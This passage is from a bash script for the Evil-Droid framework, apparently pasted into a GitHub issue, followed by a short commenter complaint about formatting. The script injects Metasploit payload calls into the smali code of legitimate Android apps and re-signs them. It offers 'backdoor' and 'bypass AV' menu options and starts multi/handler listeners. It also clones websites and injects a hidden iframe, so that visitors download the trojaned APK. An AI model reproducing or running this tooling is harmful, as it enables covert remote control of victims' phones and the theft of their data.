 sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
 android_nam=$tmp
 launcher_line_num=`grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'` 2>&1
 android_name=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_activity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
 android_targetActivity=`grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'` 2>&1
  if [ $android_name ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
 elif [ ! -e $android_activity ]; then
  echo
  echo "##################################################################"
  echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
  hook_num=`grep -n "    return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
  echo "In line:$hook_num"
  echo "##################################################################"
  starter="   invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
  sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
  rc=$?
  if [ $rc != 0 ]; then
    spinlong
    echo -e $red ""
    echo "[x] cant find : $android_activity.smali"
    echo "[*] try another ..."
    spinlong
    sleep 2
    echo
    echo "##################################################################"
    echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
    hook_num=`grep -n "    return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'` 2>&1
    echo "In line:$hook_num"
    echo "##################################################################"
    starter="   invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
    sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
  fi
 fi
}
# function chage name and icon
function merge_name_ico()
{
 echo -e $yellow ""
 echo "[*] Changing name and icon payload..."
 spinlong
 label='    <application android:label="@string/app_name">'
 label1='    <application android:label="@string/app_name" android:icon="@drawable/main_icon">'
 sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
 sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
 mkdir $path/payload/res/drawable
 cp $iconos $path/payload/res/drawable/main_icon.png
}
#function signing apk
function sign()
{
 echo -e $yellow ""
 echo "[*] Checking for ~/.android/debug.keystore for signing..."
 spinlong
 if [ ! -f ~/.android/debug.keystore ]; then
     echo -e $red ""
     echo " [ X ] Debug key not found. Generating one now..."
     spinlong
     if [ ! -d "~/.android" ]; then
       mkdir ~/.android > /dev/null 2>&1
     fi
     echo -e $lightgreen ""
     keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000 
 fi
 spinlong
 echo -e $yellow ""
 echo "[*] Attempting to sign the package with your android debug key"
 spinlong
 jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1
 echo -e $yellow 
 echo "[*] Verifying signed artifacts..."
 spinlong
 jarsigner -verify -certs evil.apk > /dev/null 2>&1
 rc=$?
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo "[!] Failed to verify signed artifacts"
   apache_svc_stop
   postgresql_stop
   exit $rc
 fi
 echo -e $yellow
 echo "[*] Aligning recompiled APK..."
 spinlong
 zipalign 4 evil.apk $apk_name.apk 2>&1
 rc=$?
 echo -e $yellow
 echo "[✔] Done."
 spinlong
 if [ $rc != 0 ]; then
   echo -e $red ""
   echo "[!] Failed to align recompiled APK"
   apache_svc_stop
   postgresql_stop
   exit $rc
 fi
 rm evil.apk > /dev/null 2>&1
}
#function ask
function quests()
{
while true; do
   echo ""
   quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null) 
   case $quest in
   APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
   ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
   esac
done
}
#function listeners
function listener()
{
  xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
}
#function clone site
function clns()
{
 clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
}
function index_name()
{
 index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
 echo -e $yellow ""
 echo "[*] Clone Website From URL..."
 spinlong
 wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
}
function launcher()
{
 echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script></body></html>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index
 com=`cat apk_index`
 rep="</body></html>"
 sed "s|$rep|$com|" $index.html > index2.html
 mv index2.html /var/www/html/$index.html > /dev/null 2>&1
 cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1
 rm apk_index > /dev/null 2>&1
 rm $index.html > /dev/null 2>&1
 zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1
}
#function attack verctor
function atkv()
{
while true; do
   echo ""
   atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null) 
   case $atk_v in
   Multi-Handler) listener;suite;;
   Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;;
   Main-Menu) clear;main;;
   Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
   esac
done
}
#function suite
function suite()
{
while true; do
   echo ""
   suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null) 
   case $suit in
   Main-Menu) clear;main;;
   Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
   esac
done
}
#function clean files
function clean()
{
 rm $directory/* > /dev/null 2>&1
 rm $path/*.jpeg > /dev/null 2>&1
 rm $path/*.txt > /dev/null 2>&1
 rm /var/www/html/*.apk > /dev/null 2>&1
 rm /var/www/html/$index.html > /dev/null 2>&1
}      
start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null)
  if [ "$?" -eq "0" ]; then
    apache_svc_start
    postgresql_start
  else
    clear
    echo ""
    echo -e $lightgreen "╔──────────────────────────────────────────────╗"
    echo -e $lightgreen "|           Author: Mascerano Bachir           |"
    echo -e $lightgreen "|    Evil-Droid Framework $ver - Dev-labs.co   |"
    echo -e $lightgreen "|   Credits to : MrPedroubuntu , Kader Achraf  |"
    echo -e $lightgreen "|               , youcef yahia                 |"
    echo -e $lightgreen "|              and Mohammed Yacine             |"
    echo -e $lightgreen "┖──────────────────────────────────────────────┙"
    echo ""
    apache_svc_stop
    postgresql_stop
    exit
  fi
clear
#main menu
function main()
{
    while :
    do

        print_ascii_art
        echo -e $green ""
        echo "╔──────────────────────────────────────────────╗"
        echo "|          Evil-Droid Framework $ver           |"
        echo "|      Hack & Remote android plateform         |"
        echo "┖──────────────────────────────────────────────┙"
        echo "[1] APK MSF                                     "
        echo "[2] BACKDOOR APK ORIGINAL (OLD)                 "
        echo "[3] BACKDOOR APK ORIGINAL (NEW)                 "
        echo "[4] BYPASS AV APK (ICON CHANGE)                 "
        echo "[5] START LISTENER                              "
        echo "[c] CLEAN                                       "
        echo "[q] QUIT                                        "
        read -p "[?] Select>: " option
        echo
        
        case "$option" in 
            1)  echo -e $lightgreen "[✔] APK MSF"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                echo
                spinlong
                gen_payload
                mv $apk_name.apk $path/evilapk > /dev/null 2>&1
                error0
                sleep 2
                echo ""
                zenity --title "☢ EVIL-DROID ☢" --info --text "APK PAYLOAD : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
                atkv
                echo
                ;;
            2)  echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (OLD)"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                echo
                orig_apk
                echo
                spinlong
                up_apktook
                embed_payload
                echo 
                mv $apk_name.apk $path/evilapk > /dev/null 2>&1
                error
                sleep 2
                echo ""
                zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
                atkv 
                echo
                ;;
            3)  echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (NEW)"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload
                echo
                orig_apk
                echo
                spinlong
                gen_payload
                up_apktook
                apk_decomp1
                apk_decomp
                perms
                hook_smalies
                spinlong
                apk_comp1
                sign
                echo 
                mv $apk_name.apk $path/evilapk > /dev/null 2>&1
                error
                sleep 2
                echo ""
                zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
                atkv 
                echo
                ;;
            4)  echo -e $lightgreen "[✔] BYPASS AV APK"
                echo -e $green
                get_lhost
                get_lport
                echo
                payload_name
                get_payload1
                echo
                quests
                mv $apk_name.apk $path/evilapk > /dev/null 2>&1
                error
                sleep 2
                echo 
                zenity --title "☢ EVIL-DROID ☢" --info --text "APK SIGNED : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1
                atkv 
                echo
                ;;
            5)  echo -e $lightgreen "[✔] START LISTENER"
                echo -e $green
                get_lhost
                get_lport
                echo
                get_payload
                echo
                listener
                suite 
                echo
                ;;
            c)  echo -e $lightgreen "[✔] clean up all files"
                echo
                clean
                echo
                zenity --title "☢ EVIL-DROID ☢" --info --text "All Files Are Removed " --width 400 > /dev/null 2>&1
                echo
                clear
                ;;
            q)  echo -e $yellow " Good Bye !!"
                apache_svc_stop
                postgresql_stop
                echo
                exit 0 
                ;;
            *)  echo -e $red  "【X】 Invalid option, please write a valid number【X】"
                echo
                sleep 2
                ;;
        esac
    done
}
main
@Reelix
Copy link

Reelix commented May 8, 2021

1.) Your description should be a brief summary - Not the entire code block.
2.) This is a partial duplicate of #47 with similar issues
3.) SUCCESS is not spelled SUCSESS

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants